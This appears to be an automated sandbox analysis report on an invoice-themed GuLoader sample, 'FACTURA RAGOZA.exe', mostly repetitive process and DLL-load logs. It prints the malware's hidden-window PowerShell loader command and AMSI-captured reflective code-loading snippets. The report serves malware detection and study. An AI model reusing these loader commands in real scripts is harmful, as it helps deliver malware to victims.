Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: FACTURA RAGOZA.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbf< source: powershell.exe, 00000001.00000002.2247451414.0000000008653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdbEPY; source: powershell.exe, 00000001.00000002.2247541726.00000000086D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5L source: powershell.exe, 00000001.00000002.2247510230.0000000008693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb9 source: powershell.exe, 00000001.00000002.2241151910.0000000007374000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdbmjY source: powershell.exe, 00000001.00000002.2247541726.00000000086D4000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2248410739.000000000A4E6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((landscapist $Tjenestegringen56 $Ceylanite), (udbokse @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Comonomer = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Carnivals)), $Widbin).DefineDynamicModule($Udraabet, $false).DefineType($Procurals, $Kapabel, [System.MulticastDelegate])$Dukketeatren

Suspicious powershell command line found

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)"
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)"			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C38783 push ebp; ret	6_2_23C38786
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C38787 push esi; ret	6_2_23C3878A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C38743 push eax; ret	6_2_23C38756
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C38757 push ecx; ret	6_2_23C3875A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3875B push edx; ret	6_2_23C38762
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C38763 push edx; ret	6_2_23C38766
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C38767 push edx; ret	6_2_23C3876A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C38773 push ebx; ret	6_2_23C3877A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3877B push ebx; ret	6_2_23C3877E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3877F push ebp; ret	6_2_23C38782
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_23C3880B push 688723C3h; ret	6_2_23C38816

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\FACTURA RAGOZA.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
